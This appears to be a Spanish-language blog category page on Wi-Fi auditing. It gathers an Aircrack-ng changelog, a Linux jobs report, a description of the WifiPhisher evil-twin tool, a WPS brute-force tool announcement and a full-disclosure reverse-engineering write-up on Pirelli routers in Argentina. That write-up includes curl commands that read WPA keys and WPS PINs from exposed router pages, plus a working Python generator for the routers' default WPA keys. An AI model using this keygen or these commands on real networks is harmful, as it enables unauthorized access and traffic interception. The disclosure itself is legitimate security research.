Archivo de la categoría: Hacking wifi linux

Auditoria wireless en linux

Aircrack-ng 1.2 Release Candidate 2

Here is the second release candidate. Along with a LOT of fixes, it improves the support for the Airodump-ng scan visualizer. Airmon-zc is mature and is now renamed to Airmon-ng. Also, Airtun-ng is now able to encrypt and decrypt WPA on top of WEP. Another big change is recent version of GPSd now work very well with Airodump-ng.

Changelog

    Airtun-ng: Adds WPA CCMP and TKIP decryption and CCMP encryption
    Compilation: Added support for DUMA.
    Makefile: Renamed ‘unstable’ to ‘experimental’.
    Airodump-ng: Fixed XML sanitizing.
    Airmon-ng: Airmon-zc is now stable enough to replace airmon-ng.
    Manpages: Removed airdriver-ng manpage and references to it (forgot to do it before the previous release).
    Manpages: Updated ‘see also’ references in all manpages.
    PCRE: Added it in various places and docs.
    WZCook: Fixed processing values stored in register.
    Updated a few headers files (if_llc, ieee80211, ethernet and if_arp).
    Travis CI: updated make parameter and add testing with pcre.
    Compilation: de-hardcode -lpcap to allow specifying pcap libraries.
    Makefile: Fixed installing/uninstalling Airdrop-ng documentation files.
    Makefile: Fixed uninstalling ext_scripts.
    Airodump-ng: Added new paths (and removed one) for OUI files and simplified logic to find the OUI file.
    Aircrack-ng: Fixed ignoring -p when specified after -S.
    Airmon-ng: fixes for openwrt busybox ps/grep issues which do not seem present in other versions of busybox
    Airmon-ng: fix vm detection.
    Airserv-ng: Fixed channel setting (and assert call).
    Airodump-ng: Fixes to NetXML (unassociated clients missing and various other small bugs) and update the code to match current NetXML output.
    Airodump-ng: Removed requirement for 2 packets before AP is written to output (text) files.
    Airodump-ng: Fixed formatting of ESSID and display of WPA/WPA2 (as well as a bunch of other small fixes) in CSV file.
    Airodump-ng: Fixed GPSd.
    Airodump-ng: Allow to specify write interval for CSV, kismet CSV and NetXML files.
    Airserv-ng: Fixed wrong station data displayed in Airodump-ng.
    General: Fixed 64 bit promotion issues.
    General: Fixed a bunch of uninitialized values and non-zeroed structures (upon allocating them).
    General: Added Stack protection.
    Various other small fixes and improvements.

POSTED BY MISTER_X

Fuente

Informe sobre empleos de Linux 2015: alta demanda de profesionales de Linux

El auge de las plataformas de nube abierta aumenta la necesidad de especialistas en Linux; los responsables de contratación buscan cada vez más profesionales certificados para los puestos más altos

Los reclutadores están aumentando sus esfuerzos por contratar talentos de Linux, según el Informe sobre empleos de Linux 201, el cual efectúa pronósticos sobre el mercado de trabajo de Linux basándose en una encuesta entre responsables de contratación y profesionales de Linux. Los responsables de contratación también están buscando pruebas de una capacitación formal y certificaciones para identificar a candidatos calificados.

El Informe sobre empleos de Linux 2015 incluye datos de los responsables de contratación (1.010) y profesionales de Linux (3.446) y proporciona una visión general de la situación del mercado para las carreras de Linux y lo que motiva a los profesionales de esta industria.

El propósito de este informe es que la industria se entere sobre las últimas tendencias de empleo de Linux y cómo estas impactan sobre la capacidad de los profesionales de encontrar oportunidades de trabajo gratificantes de Linux y, en el caso de los empleadores, para atraer y retener al talento calificado. Este es el cuarto año consecutivo que Dice, el principal sitio de empleos para los profesionales de la tecnología y la ingeniería, y The Linux Foundation, la organización sin fines de lucro dedicada a apoyar el crecimiento de Linux y el desarrollo colaborativo, elaboran el Informe sobre empleos de Linux.

“La competencia por el talento de Linux se acelera a medida que el software se hace más omnipresente”, dijo Shravan Goli, presidente de Dice. “Los responsables de contratación necesitan asegurarse de que están ofreciendo los incentivos apropiados para atraer talento, mientras que los profesionales necesitan presentar pruebas de sus conocimientos y habilidades, especialmente en las áreas de crecimiento de la demanda, como es el caso de la nube”.

Estas son algunas de las principales estadísticas del informe:

– Casi todos los responsables de contratación quieren contratar a profesionales de Linux en los próximos seis meses Con los nuevos sistemas basados en Linux, están surgiendo constantemente proyectos y productos. La contratación de los talentos adecuados para respaldar todo el crecimiento continúa siendo una prioridad entre los empleadores. El 97 por ciento de los responsables de contratación dice que contratará a talento de Linux para otras áreas de competencia en los próximos seis meses.

– El auge de las plataformas de nube abierta está creando aún más la demanda de profesionales de Linux con la pericia y los conocimientos adecuados. El 42 por ciento de los responsables de contratación dice que la experiencia en OpenStack y CloudStack tendrá un impacto importante en sus decisiones de contratación, mientras que el 23 por ciento dice que la seguridad es una área de pericia muy buscada y el 19 por ciento dice que está buscando talento de Linux con habilidades en red definida por software (SDN).

Los profesionales certificados de Linux estarán especialmente bien posicionados en el mercado laboral de este año. El 44 por ciento de los responsables de contratación dice que es muy probable que contraten a un candidato con certificación Linux, y el 54 por ciento espera que sus candidatos para administración de sistemas tengan una certificación o capacitación formal.

leer mas…

WifiPhisher

Una nueva herramienta lanzada por un grupo griego de seguridad ha hecho que hackear wifi, la conexión inalámbrica entre dispositivos que acceden a internet, sea ahora mucho, mucho más sencillo y peligroso. Lo que hace a WifiPhisher más peligroso es que evitar típicos métodos de ataque, y en lugar de ello, hace uso de engaños para obtener rápidamente una contraseña.

Cómo funciona WifiPhisher y por qué es tan peligroso?

El método común para hackear wifi toma bastante tiempo porque esencialmente se están probando cientos de miles de combinaciones de contraseñas contra un router para así obtener acceso. Esto se conoce como “brute force” o ataques de fuerza bruta. Son exitosos, pero toman tiempo.

El nuevo método implementado por Wifiphisher actúa de una manera totalmente diferente. Lo que la aplicación hace, es básicamente clonar y replicar a un punto de acceso familiar de la víctima, mientras que simultáneamente se bloquea el acceso al router original. Con Wifiphisher, estamos haciéndole creer a la persona que está teniendo problemas de autentificación, al obligar a todos los clientes conectados al punto de acceso original a desconectarse. Al hacerse pasar por el router original (enviando incluso una página falsa preguntando por la contraseña), los incautos usuarios simplemente ingresan la contraseña falsa al router, proporcionándosela voluntariamente a esta réplica maligna.

Y una vez que se obtiene la contraseña original, este “gemelo diabólico” puede seguir operando como intermediario de conexión (entre el punto de acceso original y los clientes), interceptando todo el tráfico que transita por ahí. Sí, esto podría llevarnos a robo de contraseñas, información y muchísimo más.

El ataque es una inteligente mezcla de ingeniería social (el método más común de hacking), con una sencilla pero funcional aplicación

Fuente

Default WPA key generation algorithm for Pirelli routers in Argentina

Introduction

arnetrouter
Sticker with default settings

A couple of years ago whether I do not remember badly, I was doing reverse engineering in some Spanish routers deployed by Pirelli as well. After I extracted the firmware and found out a suspicious library with many references to key generation’s functions everything was over. Unfortunately, I could not recover the algorithm itself. Principally, because those routers were not using the same algorithm for generating default keys and simply because such algorithm was not explicitly there. Shit happens! However, as I could not reveal the algorithm then decided to try another way to recover keys. Eventually, I realised that these routers were vulnerable to unauthorized and unauthenticated remote access and any adversary could fetch HTML code from our public IP address. Plenty of HTMLs were able to be downloaded without any restriction, meaning a huge leakage. Being vulnerable to a bunch of evil attacks. This remote information disclosure can be seen on this CVE-2015-0554. On the other side, I do not know whether Argentinian routers are also vulnerable to this vulnerability. Feel free to try it out and let me know too. Just to see how easy was to achieve those keys in the HomeStation(essids-like WLAN_XXXX) in Spain, a simple curl command was enough:

$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "WLAN_"
                  <option value='0'>WLAN_DEAD</option>
 
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var wpapskkey"
var wpaPskKey = 'IsAklFHhFFui1sr9ZMqD';
 
$ curl -s http://${IP_ADDRESS}/wlsecurity.html | grep -i "var WscDevPin"
var WscDevPin    = '12820078';
 

Today I am gonna explain how I reverse engineered a MIPS library in order to recover the default WPA key generation algorithm for some Argentinian routers deployed by Pirelli. Concretely the router affected is the model P.DG-A4001N. First of all, I am neither Argentinian nor live there. Nevertheless, accidentally I observed some stickers from Pirelli routers in a random forum and as an user had already publicly published the firmware for those routers then I decided to give a try. As I still remembered the file where I dug into for the Spanish routers, I rapidly tried to recover the algorithm in these routers. Next writing is the way I followed until to achieve it.

Reverse-engineering the default key generation algorithm

In this section, we are going to reverse engineer a MIPS library, /lib/private/libcms.core, found out in the firmware itself. First of all, let us comment that the firmware was extracted for another user (fernando3k) and subsequently extracted by using Binwalk and firmware-mod-kit. Once was mounted into our system, we found out a function called generatekey. As you have seen, symbols have not been removed in binaries and external function names are still there because dynamic compilation. This help us a lot in our reverse engineering task. On top of that, we rapidly saw how this function was calling to another one called generatekey_from_mac. At this moment, I decided to give a go to this challenge. Before get started, IDA Pro can help us with the cross references (Xrefs to-from in IDA Pro) between functions. Let’s see how functions are called in the library. (Zoom pictures in to see properly)

Call flow from generateKey
Call flow from generateKey

Really looking great! Now let’s look at the cross references. We have figured out some tips:

  1. generatekey calls generatekey_from_mac. This allow us to suppose that the mac address is involved in the key generation algorithm. Besides, getPBSHwaddr returns a mac address and it is also called by generatekey. Verification was carried out after checking how getPBSHwaddr returned the value of /var/hwaddr ( “ifconfig %s > /var/hwaddr “)
  2. SHA256 cryptographic hash function is also involved. We then know that our key is coming from a well-known hash function. This way to generate WPA keys is very popular in some vendors because the feeling of “randomness”. Digging into this function will give us the main structure of our algorithm.
  3. The function createWPAPassphraseFromKey is called by wlWriteMdmDefault ,which also calls to generatekey as well. Hence, we discover a function called bintoascii which is basically responsible to convert binary to ascii data.
  4. The SSID is also created from the mac address although it is not relevant for our task.

 

Call flow for createWPAPassphraseFromKey
Call flow for createWPAPassphraseFromKey

Now we must dissect the generatekey_from_mac function and its SHA256 callings to figure out how many parameters are being sent as input data. Before calling generatekey, a string “1236790” is sent to this function as first argument ($a3). Nonetheless, we have to guess which is the right order for the SHA256 function, I mean how many updates there are. If we observe the below picture, we will see this step.

createWPApassphrasefromkey
Dissasembly of wlWriteMdmDefault

From generateKey_from_mac we realise that: (Look at below image)

  1. First argument is located at offset 0x000d29e0
  2. Second argument is the string we discovered previously (“1236790”)
  3. Third argument it has to be the mac address because there is an instruction load immediate with the value 6. Since a mac address is 6 bytes, we can try it out now.
sha256_seed
Dissasembly of generateKey_from_mac

As we know that the first argument is located at the offset 0xd29e0, just a jump there and let’s reveal the secret seed used in the SHA256. Now we have guessed the first argument, and we can prepare those 32 bytes into a byte-array structure to generate the SHA256 hash later on. This secret seed has been used by Pirelli too in other countries like Italy or Austria (Look at the references on the source code for more info). Furthermore, below that we can also distinguish the charset finally used to generate keys with.

seed
Secret data found out in the library.

In the end, we conclude that the algorithm is as follows: (mac address needs to be incremented by 1)

SHA256(secret_seed+”1236790″+mac_address)

More details on how keys are eventually generated in this python function:

def genkey(mac):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
 
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
   
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
 
    digest = bytearray(sha256.digest())
       
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

Problems

Since I attempted to do a responsible disclosure and neither ADB Pirelli nor Arnet Argentina were interested to discuss the problem, I have finally decided to do full disclosure to speed up the process of fixing. It looks like the only way with some vendors, just enforce them to replace routers for avoiding intrusions. Many things can happen whether your router with SSID Wifi-Arnet-XXXX has the default password. For your information, default passwords are located in a sticker at the bottom of routers. If you are owner of these networks, please change your password as soon as possible. You should always change the default passwords, though. An adversary, within of the wifi range, could access to your network and commit any sort of fraud. Be safe and change the passwords right now!

Timeline

2014-09-11 Found the algorithm 2014-09-12 Send a message to @ArnetOnline via Twitter @enovella_ 2014-09-15 Send a message via website, still looking for a simple mail 2014-09-16 Send another message to Arnet via website.First reply via twitter where they redirect me to the website form. 2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key 2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though. 2014-09-23 I assume that Arnet does not care about its clients’ security at all regarding its little interest. 2014-09-24 I send the problem to the vendor ADB Pirelli via website form 2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland 2015-01-05 Full disclosure

Proof-of-concept

This proof-of-concept and many Pirelli default key generation algorithms might be found at my Bitbucket repository. I hope you can use them. Also a copy&paste of the first version can be looked at below. To be installed just make sure you got git installed on your system and then run:

$ git clone https://dudux@bitbucket.org/dudux/adbpirelli.git
$ python wifiarnet.py
 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
 
'''
@license: GPLv3
@author : Eduardo Novella
@contact: ednolo[a]inf.upv.es
@twitter: @enovella_
 
-----------------
[*] Target      :
-----------------
Vendor           : ADB broadband Pirelli
Router           : Model P.DG-A4001N
ISP              : Arnet Telecom Argentina
Possible-targets : http://hwaddress.com/?q=ADB%20Broadband%20Italia
Firmware         : http://foro.seguridadwireless.net/puntos-de-acceso-routers-switchs-y-bridges/obtener-firmware-adb-p-dg-a4001n-%28arnet-telecom-argentina%29/  
 
-----------------
[*] References  :
-----------------
[0] [AUSTRIA] A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness    http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
[1] [ITALY]   Alice AGPF: The algorithm!                                            http://wifiresearchers.wordpress.com/2010/06/02/alice-agpf-lalgoritmo/
 
-----------------
[*] Test vectors :
-----------------
http://www.arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551
 
-----------------------
[*] Acknowledgements  :
-----------------------
Thanks to fernando3k for giving me the firmware in order to do reverse-engineering on it, and christian32 for showing me a bunch of test vectors.
 
-----------------
[*] Timeline    :
-----------------
2014-09-11  Found the algorithm
2014-09-12  Send a message to @ArnetOnline via Twitter @enovella_
2014-09-15  Send a message via website, still looking for a simple mail (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19  Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20  More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23  I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24  I send the problem to the vendor ADB Pirelli via website form
2014-09-28  I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05  Full disclosure
 
-----------------
[*] TODO        :
-----------------
1.- Reverse-engineering the function generateSSIDfromTheMac. It is not relevant though.
2.- Extract more firmwares from others vendors and send them to me.
 
'''
 
import re
import sys
import hashlib
import argparse
 
VERSION     = 1
SUBVERSION  = 0
DATEVERSION = '2014-09-11'
URL         = 'http://www.ednolo.alumnos.upv.es'
 
def genkey(mac,stdout='True'):
    seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x91\x3F\xDC\xE8')
 
    lookup  = '0123456789abcdefghijklmnopqrstuvwxyz'
   
    sha256 = hashlib.sha256()
    sha256.update(seed)
    sha256.update('1236790')
    sha256.update(mac)
 
    digest = bytearray(sha256.digest())
 
    if (stdout):
        print "[+] SHA256  : %s" % sha256.hexdigest()
       
    return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])
 
 
def printTargets():
        print "[+] Possible vulnerable targets so far:"
        for t in targets:
            print ("\t bssid: {0:s}:XX:XX:XX \t essid: Wifi-Arnet-XXXX".format(t.upper()))
 
        sys.exit()
 
def checkTargets(bssid):
        supported = False
        for t in targets:
            if ( bssid.upper().startswith(t) ):
                supported = True
                break
        if (not supported):
            print "[!] Your bssid looks like not supported! Generating anyway."
       
def main():
   
    global targets
    version     = " {0:d}.{1:d}  [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
    targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',
    '30:39:F2','74:88:8B','84:26:15','A4:52:6F','A4:5D:A1','D0:D4:12','D4:D1:84','DC:0B:1A','F0:84:2F']
   
    parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina. So far
                                                 only WiFi networks with essid like Wifi-Arnet-XXXX and manufactured by Pirelli are
                                                 likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
                                                 Twitter: @enovella_  and   email: ednolo[at]inf.upv.es''',
                                                 epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])
                                    )
   
    maingroup = parser.add_argument_group(title='required')
    maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
    command_group = parser.add_mutually_exclusive_group()
    command_group.add_argument('-l','--list', help='List all vulnerable targets (essid Wifi-Arnet-XXXX)', action='store_true')
   
    args = parser.parse_args()
 
    if args.list:
        printTargets()
    elif args.bssid:
        mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
        if len(mac_str) != 12:
            sys.exit('[!] Check MAC format!\n')
 
        try:
            mac = bytearray.fromhex('%012x' %(int(mac_str,16) +1))
        except:
            sys.exit('[!] Use real input :)')
 
        checkTargets(args.bssid)
        print '[+] SSID    : Wifi-Arnet-XXXX'
        print '[+] MAC     : %s' % args.bssid
        print '[+] WPA key : %s' % (genkey(mac,False))
    else:
        parser.print_help()
 
if __name__ == "__main__":
    main()

00:30

Script reset_iface (detecta y reinicia el driver de una interfce de red)

Autor: geminis_demon

Buenas.

Pues eso, este script detecta el driver de la interface que se le pase como parámetro, y lo reinicia (lo desmonta y lo vuelve a montar).

Esto es útil a la ora de realizar una auditoría, ya que al desmontar y volver a montar el driver te aseguras de que la interface está “limpia”, no está siendo usada por ningún proceso y no está fijada a ningún canal.

La idea de hacer el script me vino al leer un comentario de Alister que decía que el hacía eso siempre antes de comenzar una auditoría, y me pareció buena idea  hacer un script que automatice el proceso

Code:
#!/bin/bash
# Script: reset_iface # Por geminis_demon para Wifislax-# SeguridadWireless.Net

if [ $(id -u) != 0 ]; then
echo “ERROR: Este script debe ejecutarse con permisos de ROOT”
exit 1
fi

if [ -z “$1” -o “$1” = “-h” ]; then
echo
echo “Este script desmonta y vuelve a montar el driver de una interface” echo “de red”
echo 
echo “USO:”
echo ” $0 interface”
echo
echo “OPCIONES:”
echo ” -h  Muestra esta ayuda.”
echo 
if [ -z “$1” ]; then
exit 1
else
exit 0
fi
fiIFACE=”$1″

if [ ! “$(ip link|grep ” $IFACE: “)” ]; then
echo
echo ” – ERROR: No existe la interface \”$IFACE\””
echo
exit 1
fi

DRIVER=”$(basename “$(ls -l “/sys/class/net/$IFACE/device/driver”)”)”

if [ ! “$DRIVER” ]; then 
echo
echo ” – ERROR: No ha sido posible encontrar el driver de $IFACE”
echo
exit 1
fi

echo
echo ” – La interface $IFACE utiliza el driver $DRIVER”

rmmod -f “$DRIVER” && modprobe “$DRIVER”

if [ $? = 0 ]; then 
echo ” – El driver $DRIVER ha sido reiniciado”
echo
fi

WPS-Qi

Autor: peluzza

WPS-Qi

WPS Python Suite

Si python tiene un zen, WPS tiene un chi (Qi), y adoro los nombres recursivos, así que si no se me ocurre algo mejor, este será su nombre .

WPS-Qi Es una herramienta de auditoría wireless que actualmente solo realiza ataques por WPS, aunque en un futuro inmediato tambien auditará WPA/WPA2.

A estas alturas te estarás preguntando: Si hay docenas de scripts de ataque con estas características, ¿por que utilizar WPS-Qi?
Seguramente no aporta nada nuevo desde la perspectiva del usuario “típico” de este tipo de aplicaciones. Si tú te encuentras en este tipo de usuarios, te recomiendo encarecidamente que le eches un ojo a otros trabajos más que consolidados y con más funcionalidades y soporte, como son GOYScript de GOYfilms y BullyWPSDialog de Geminis_demon.

Pero desde la perspectiva del desarrollador ofrece nuevas vías y medios para futuros proyectos:

Sus mejores cartas son:

  • Desarrollado INTEGRAMENTE en python, totalmente modular y con codigo totalmente reutilizable.
  • Soporte COMPLETO* para openwrt (linux en tu router!).
  • Bully como motor de ataque, con soporte completo, ataque configurable y feedback en tiempo real.
  • GPL v.3.
  • TODO sucede en una sola ventana de terminal. Nada de abrumadores datos en pantalla.
  • Todos los programas externos son subprocesos de wps-qi, por lo que funciona en modo sandbox.
  • No requiere sesión gráfica, funcional desde línea de comando.
  • tiene colorines!!!! Grin
  • CASI** Multiplataforma.  Azn

* Gracias al trabajo de sephir0t00
** Aunque el código es multiplataforma, bully solo funciona en linux. En el futuro se dará soporte a reaver, que aunque ya no es mantenido por su creador bajo GPL, sí que funciona en otros sabores UNIX.

Ataque por WPS:
En el estadio actual, ataque por fuerza bruta con bully. Estoy estudiando todos los trucos para intentar adaptar al máximo el ataque al objetivo ANALIZANDO SU RESPUESTA a través del stdout de Bully. Por ejemplo, los primeros ataques tendrán un tiempo de espera corto que se adaptará en función de lo que tarde en estar de nuevo “receptivo” el router, e iré incluyendo cuantos trucos, pines por defecto, routers sin checksum, etc que vaya encontrando o me vayáis chivando.

ATENCION!: Ejecutar este programa mata todos lo procesos que puedan causar conflictos con la ejecución del script, es decir, que te desconectará de la red. Próximamente se utilizará un método menos agresivo, distinguiendo qué proceso pueden o no matarse.

ATENCIÓN!: Este es una herramienta de auditoría wireless, no una herramienta para gorronear a tus vecinos. Si quieres internet, harás muy bien en pagártela. No me responsabilizo del uso que des a esta herramienta ni del código que resulte de su modificación.

INSTALACIÓN:

Recomiendo obtener la última versión desde mi repositorio:

Código:
git clone https://peluzza@bitbucket.org/peluzza/wpsqi.git

Por ahora el script tiene las siguientes dependencias:
python – de serie en casi todas las distros (menos openwrt… ¬ ¬ )
easy_install
aircrack-ng
wash (por ahora no tengo substituto propio, pero todo se andará)
bully

Si utilizais wifislax ya teneis todo lo que hace falta. Solo se necesita instalar un módulo externo de python, es tan sencillo como ejecutar

Código:
“easy_instal netifaces”

y ya está, solo queda ejecutar el archivo wps-qi.py con privilegios de root.
para ejecutarlo podeis hacerlo ejecutable

Código:
“chmod 775 wps-qi.py”
./wps-qi.py

o bien ejecutarlo a través del interprete de python

Código:
sudo python wps-qi.py

Próximamente, instrucciones para ejecutarlo en openwrt.

BUGS CONOCIDOS:

Hasta ahora el código está muy limpio hasta que llega el momento de ejecutar bully. Me ha dado muchos dolores de cabeza un pequeño problema con la captura del stdout, por lo que llega un poco tarde y todavía no esta todo lo depurado que quisiera, en futuras actualizaciónes la información en pantalla será tan limpia como el resto de programa. Es mi tarea para estos días.

Es posible modificar el script manualmente para modificar el ataque de bully, por ahora solo para los que saben lo que hacen. Más informacion en el README.md

Espero impacientemente vuestro feedback a través de este hilo.

CÓDIGO FUENTE:
https://bitbucket.org/peluzza/wpsqi/src

AGRADECIMIENTOS: A todos los que desarrolláis herramientas de auditoría, pero en especial:

Brian Purcell: Por el desarrollo de bully y por ser un tipo tan majo (thanks pal Wink ).
GOYfilms: Por su magnífico GOYscript, inspiración y motivo por el que existe wps-qi.
Geminis_demon: Por ser un gran betatester y maestro, y por su genial bullyWPSdialog.
sephir0t00: Por su gran aportación portando el módulo de python netifaces a openwrt.
jar229: Por su buen saber en openwrt y por los buenos firmwares que salen de su horno.

En fin, en los próximos días iré publicando pantallazos, y calculo que este fin de semana libere la primera alpha de lo que hoy día es funcional.


Stay Tuned…